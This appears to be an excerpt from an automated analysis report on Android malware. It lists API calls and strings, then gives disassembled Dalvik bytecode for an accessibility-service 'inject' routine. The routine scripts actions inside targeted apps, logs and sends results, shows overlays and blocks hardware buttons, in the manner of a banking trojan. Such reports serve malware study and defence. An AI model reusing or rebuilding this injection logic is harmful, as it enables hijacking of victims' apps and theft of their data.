                        • org.json.JSONObject.getBoolean
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • org.json.JSONArray.length
                        • java.lang.Boolean.valueOf
                        • java.lang.StringBuilder.<init>
                        • org.json.JSONArray.get
                        • java.lang.Object.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • android.view.accessibility.AccessibilityEvent.eventTypeToString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getBoolean
                        • java.util.concurrent.Semaphore.release
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.Integer.intValue
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.lang.Integer.intValue
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.toString
                        • java.lang.Integer.valueOf
                        • java.util.concurrent.Semaphore.release
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • java.util.concurrent.Semaphore.release
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Throwable.toString
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.util.concurrent.Semaphore.release
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONArray.getJSONObject
                        • java.lang.Boolean.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Boolean.booleanValue
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • java.lang.Integer.valueOf
                        • java.util.List.contains
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.Object.equals
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • [func] [inject] [doInject] isA11ySniffer:
                        • isA11yInjected:
                        • debug
                        • aInjDebug
                        • Error found
                        • inject
                        • exist
                        • checkExist: FOUND
                        • once
                        • <<<injectStep:
                        • injectStep:
                        • type:
                        • repeatSearch
                        • mayBe
                        • isNext
                        • options
                        • injectResult:
                        • isNext:
                        • isSearchEvent:
                        • errorMsg:
                        • searchRetries:
                        • Inject Ended [result]:
                        • fail[line]:
                        • ID
                        • result
                        • line
                        • error
                        • aInjResult
                        • skip
                        • Could not parse malformed Injects: \"
                        • \"
                        • result:
                        • [func] [aInjResult] T:
                        • aSniffPrefs
                        • aSniffLog
                        • [func] [doInject] snifferMutex error:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v4, 0x1
                        2const/4 v1, 0x0
                        3new-instance v0, Ljava/lang/StringBuilder;
                        5invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        7const-string v2, "[func] [inject] [doInject] isA11ySniffer: "
                        9invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        10move-result-object v0
                        11sget-boolean v2, Lcom/lib;->isA11ySniffer:Z
                        13invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        14move-result-object v0
                        16const-string v2, " isA11yInjected: "
                        18invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        19move-result-object v0
                        20sget-boolean v2, Lcom/lib;->isA11yInjected:Z
                        22invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        23move-result-object v0
                        25invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        26move-result-object v0
                        28invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        29sget-boolean v0, Lcom/lib;->isA11yInjected:Z
                        30if-eqz v0, :cond_4ad
                        31try_start_2a:
                        32sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        34invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->acquire()V
                        35try_start_2f: new-instance v0, Lorg/json/JSONObject;
                        37sget-object v2, Lcom/lib;->injectJSON:Ljava/lang/String;
                        39invoke-direct {v0, v2}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
                        41sget-object v2, Lcom/lib;->injectedPackage:Ljava/lang/String;
                        43invoke-virtual {v2}, Ljava/lang/String;->isEmpty()Z
                        44move-result v2
                        45if-eqz v2, :cond_49
                        47invoke-virtual {v0}, Lorg/json/JSONObject;->names()Lorg/json/JSONArray;
                        48move-result-object v2
                        49const/4 v3, 0x0
                        51invoke-virtual {v2, v3}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
                        52move-result-object v2
                        53sput-object v2, Lcom/lib;->injectedPackage:Ljava/lang/String;
                        54cond_49:
                        55sget-object v2, Lcom/lib;->injectedPackage:Ljava/lang/String;
                        57invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        58move-result-object v3
                        60invoke-virtual {v2, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        61try_end_52: move-result v2
                        62if-eqz v2, :cond_318
                        63try_start_55:
                        64invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        65move-result-object v2
                        67invoke-interface {v2}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        68move-result-object v2
                        70invoke-virtual {v0, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        71move-result-object v2
                        73const-string v3, "debug"
                        75invoke-virtual {v2, v3}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        76move-result v2
                        77if-nez v2, :cond_97
                        79invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        80move-result-object v2
                        82invoke-interface {v2}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        83move-result-object v2
                        85invoke-virtual {v0, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        86move-result-object v2
                        88const-string v3, "debug"
                        90invoke-virtual {v2, v3}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        91move-result v2
                        92if-eqz v2, :cond_97
                        94invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        95move-result-object v2
                        97invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        98move-result-object v2
                        100invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        102iget-object v2, p0, Lcom/lib;->context:Landroid/content/Context;
                        104const-string v3, "aInjDebug"
                        106invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        107move-result-object v5
                        109invoke-virtual {v5}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        110move-result-object v5
                        112invoke-virtual {p0, v2, v3, v5}, Lcom/lib;->sendLog(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Z
                        113cond_97:
                        114invoke-direct {p0, p1}, Lcom/lib;->checkError(Landroid/view/accessibility/AccessibilityEvent;)Z
                        115move-result v2
                        116if-eqz v2, :cond_528
                        118const-string v2, "Error found"
                        120invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        122invoke-direct {p0}, Lcom/lib;->cleanError()V
                        123move v3, v1
                        124goto_a6: if-eqz v3, :cond_524
                        126invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        127try_end_ab: move-result-object v6
                        128if-nez v6, :cond_bd
                        129try_start_ae:
                        130sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        132invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        133cond_b3: return-void
                        134catch_b4: move-exception v0
                        136sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        138invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        139try_end_ba: goto/16 :goto_b3
                        140catch_bb: move-exception v0
                        141goto/16 :goto_b3
                        142cond_bd:
                        143invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        144move-result-object v2
                        146invoke-interface {v2}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        147move-result-object v2
                        149invoke-virtual {v0, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        150move-result-object v2
                        152const-string v5, "inject"
                        154invoke-virtual {v2, v5}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        155move-result-object v7
                        156const/4 v2, 0x0
                        158invoke-virtual {v7, v2}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        159move-result-object v2
                        161const-string v5, "exist"
                        163invoke-virtual {v2, v5}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        164move-result v2
                        165if-nez v2, :cond_f2
                        166const/4 v2, 0x0
                        168invoke-virtual {v7, v2}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        169move-result-object v2
                        171const-string v5, "exist"
                        173invoke-virtual {v2, v5}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        174move-result-object v2
                        176invoke-direct {p0, v6, v2}, Lcom/lib;->checkExist(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        177move-result v2
                        178if-eqz v2, :cond_f2
                        180const-string v2, "checkExist: FOUND"
                        182invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        183cond_f2:
                        184invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        185move-result-object v2
                        187invoke-interface {v2}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        188move-result-object v2
                        190invoke-virtual {v0, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        191move-result-object v2
                        193const-string v5, "once"
                        195invoke-virtual {v2, v5}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        196move-result v2
                        197if-nez v2, :cond_11a
                        199invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        200move-result-object v2
                        202invoke-interface {v2}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        203move-result-object v2
                        205invoke-virtual {v0, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        206move-result-object v0
                        208const-string v2, "once"
                        210invoke-virtual {v0, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        211move-result v0
                        212sput-boolean v0, Lcom/lib;->injectOnce:Z
                        213cond_11a: new-instance v0, Ljava/lang/StringBuilder;
                        215invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        217const-string v2, "<<<injectStep: "
                        219invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        220move-result-object v0
                        222sget-object v2, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        224invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        225move-result-object v0
                        227invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        228move-result-object v0
                        230invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        232sget-object v0, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        234invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        235try_end_137: move-result v5
                        236move v0, v1
                        237move v2, v1
                        238try_start_13a:
                        239invoke-virtual {v7}, Lorg/json/JSONArray;->length()I
                        240move-result v8
                        241if-ge v5, v8, :cond_521
                        242const/4 v8, 0x0
                        244invoke-static {v8}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        245new-instance v8, Ljava/lang/StringBuilder;
                        247invoke-direct {v8}, Ljava/lang/StringBuilder;-><init>()V
                        249invoke-virtual {v7, v5}, Lorg/json/JSONArray;->get(I)Ljava/lang/Object;
                        250move-result-object v9
                        252invoke-virtual {v9}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        253move-result-object v9
                        255invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        256move-result-object v8
                        258const-string v9, " injectStep: "
                        260invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        261move-result-object v8
                        263sget-object v9, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        265invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        266move-result-object v8
                        268const-string v9, " type: "
                        270invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        271move-result-object v8
                        273invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        274move-result v9
                        276invoke-static {v9}, Landroid/view/accessibility/AccessibilityEvent;->eventTypeToString(I)Ljava/lang/String;
                        277move-result-object v9
                        279invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        280move-result-object v8
                        282invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        283move-result-object v8
                        285invoke-virtual {p0, v8}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        287invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        288move-result-object v8
                        290const-string v9, "repeatSearch"
                        292invoke-virtual {v8, v9}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        293move-result v8
                        294if-nez v8, :cond_19f
                        295sget-boolean v8, Lcom/lib;->searchRetriesSET:Z
                        296if-nez v8, :cond_19f
                        297const/4 v8, 0x1
                        298sput-boolean v8, Lcom/lib;->searchRetriesSET:Z
                        300invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        301move-result-object v8
                        303const-string v9, "repeatSearch"
                        305invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        306move-result v8
                        307add-int/lit8 v8, v8, -0x1
                        309invoke-static {v8}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        310move-result-object v8
                        311sput-object v8, Lcom/lib;->searchRetriesMAX:Ljava/lang/Integer;
                        312cond_19f:
                        313invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        314move-result-object v8
                        316const-string v9, "mayBe"
                        318invoke-virtual {v8, v9}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        319move-result v8
                        320if-nez v8, :cond_1e6
                        322invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        323move-result-object v8
                        325const-string v9, "mayBe"
                        327invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        328move-result-object v8
                        330invoke-direct {p0, p1, v6, v8}, Lcom/lib;->checkMayBe(Landroid/view/accessibility/AccessibilityEvent;Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        331move-result v8
                        332if-eqz v8, :cond_1e6
                        334invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        335move-result-object v8
                        337const-string v9, "mayBe"
                        339invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        340move-result-object v8
                        342const-string v9, "isNext"
                        344invoke-virtual {v8, v9}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        345move-result v8
                        346if-nez v8, :cond_1e6
                        348invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        349move-result-object v8
                        351const-string v9, "mayBe"
                        353invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        354move-result-object v8
                        356const-string v9, "isNext"
                        358invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        359try_end_1dc: move-result v8
                        360if-eqz v8, :cond_1e6
                        361try_start_1df:
                        362sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        364invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        365try_end_1e4: goto/16 :goto_b3
                        366cond_1e6: if-nez v0, :cond_3a3
                        367try_start_1e8:
                        368invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        369move-result-object v8
                        371const-string v9, "options"
                        373invoke-virtual {v8, v9}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        374move-result v8
                        375if-nez v8, :cond_34c
                        377invoke-virtual {v7, v5}, Lorg/json/JSONArray;->getJSONObject(I)Lorg/json/JSONObject;
                        378move-result-object v8
                        380const-string v9, "options"
                        382invoke-virtual {v8, v9}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        383move-result-object v8
                        385invoke-direct {p0, p1, v6, v8}, Lcom/lib;->checkOptions(Landroid/view/accessibility/AccessibilityEvent;Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        386move-result v8
                        387if-nez v8, :cond_323
                        389sget-object v0, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        391invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        392move-result v0
                        394sget-object v5, Lcom/lib;->searchRetriesMAX:Ljava/lang/Integer;
                        396invoke-virtual {v5}, Ljava/lang/Integer;->intValue()I
                        397try_end_20f: move-result v5
                        398if-ge v0, v5, :cond_31f
                        399move v0, v4
                        400goto_213:
                        401sget-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        403sget-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        405invoke-virtual {v4}, Ljava/lang/Integer;->intValue()I
                        406move-result v4
                        407add-int/lit8 v4, v4, 0x1
                        409invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        410move-result-object v4
                        411sput-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        412try_start_223: new-instance v1, Ljava/lang/StringBuilder;
                        414invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        416const-string v4, "injectResult: "
                        418invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        419move-result-object v1
                        421invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        422move-result-object v1
                        424const-string v4, " injectStep: "
                        426invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        427move-result-object v1
                        429sget-object v4, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        431invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        432move-result-object v1
                        434const-string v4, " isNext: "
                        436invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        437move-result-object v1
                        439invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        440move-result-object v1
                        442const-string v4, " isSearchEvent: "
                        444invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        445move-result-object v1
                        447invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        448move-result-object v1
                        450const-string v4, " errorMsg: "
                        452invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        453move-result-object v1
                        455sget-object v4, Lcom/lib;->errorMsg:Ljava/lang/String;
                        457invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        458move-result-object v1
                        460const-string v4, " searchRetries: "
                        462invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        463move-result-object v1
                        465sget-object v4, Lcom/lib;->searchRetries:Ljava/lang/Integer;
                        467invoke-virtual {v1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        468move-result-object v1
                        470invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        471move-result-object v1
                        473invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        474if-nez v2, :cond_318
                        475if-nez v0, :cond_318
                        476sget-boolean v0, Lcom/lib;->injectOnce:Z
                        477if-eqz v0, :cond_311
                        479const-string v0, ""
                        480sput-object v0, Lcom/lib;->injectedPackage:Ljava/lang/String;
                        482const-string v0, ""
                        483sput-object v0, Lcom/lib;->injectJSON:Ljava/lang/String;
                        485const-string v0, ""
                        486sput-object v0, Lcom/lib;->injectJSON:Ljava/lang/String;
                        487const/4 v0, 0x0
                        488sput-boolean v0, Lcom/lib;->isA11yInjected:Z
                        489new-instance v0, Ljava/lang/StringBuilder;
                        491invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        493const-string v1, "Inject Ended [result]: "
                        495invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        496move-result-object v0
                        498invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        499move-result-object v0
                        501const-string v1, " fail[line]: "
                        503invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        504move-result-object v0
                        506sget-object v1, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        508invoke-virtual {v1}, Ljava/lang/Integer;->intValue()I
                        509move-result v1
                        510add-int/lit8 v1, v1, 0x1
                        512invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        513move-result-object v0
                        515const-string v1, " errorMsg: "
                        517invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        518move-result-object v0
                        520sget-object v1, Lcom/lib;->errorMsg:Ljava/lang/String;
                        522invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        523move-result-object v0
                        525invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        526move-result-object v0
                        528invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        530sget-object v0, Lcom/lib;->injectJSONid:Ljava/lang/Integer;
                        532invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        533try_end_2c1: move-result v0
                        534const/4 v1, -0x1
                        535if-eq v0, v1, :cond_2f7
                        536try_start_2c5: new-instance v0, Lorg/json/JSONObject;
                        538invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        540const-string v1, "ID"
                        542sget-object v2, Lcom/lib;->injectJSONid:Ljava/lang/Integer;
                        544invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        546const-string v1, "result"
                        548invoke-virtual {v0, v1, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        549if-nez v3, :cond_2ec
                        551const-string v1, "line"
                        553sget-object v2, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        555invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        556move-result v2
                        557add-int/lit8 v2, v2, 0x1
                        559invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
                        561const-string v1, "error"
                        563sget-object v2, Lcom/lib;->errorMsg:Ljava/lang/String;
                        565invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        566cond_2ec:
                        567iget-object v1, p0, Lcom/lib;->context:Landroid/content/Context;
                        569const-string v2, "aInjResult"
                        571invoke-virtual {v0}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        572move-result-object v0
                        574invoke-virtual {p0, v1, v2, v0}, Lcom/lib;->sendLogThread(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
                        575cond_2f7: sput-boolean v3, Lcom/lib;->globalInjectResult:Z
                        576sget-boolean v0, Lcom/lib;->overlayHIDE:Z
                        577if-eqz v0, :cond_300
                        579invoke-static {}, Lcom/lib;->removeOverlay()Z
                        580cond_300: const/4 v0, 0x0
                        581sput-boolean v0, Lcom/lib;->blockHardwareButtons:Z
                        583sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        585sget-object v1, Lcom/lib;->navBar:Landroid/widget/FrameLayout;
                        587invoke-static {v0, v1}, Lcom/lib;->unHideArea(Landroid/content/Context;Landroid/widget/FrameLayout;)Z
                        589sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        591sget-object v1, Lcom/lib;->actBar:Landroid/widget/FrameLayout;
                        593invoke-static {v0, v1}, Lcom/lib;->unHideArea(Landroid/content/Context;Landroid/widget/FrameLayout;)Z
                        594cond_311: const/4 v0, 0x0
                        596invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        597move-result-object v0
                        598sput-object v0, Lcom/lib;->injectStep:Ljava/lang/Integer;
                        599try_end_318:
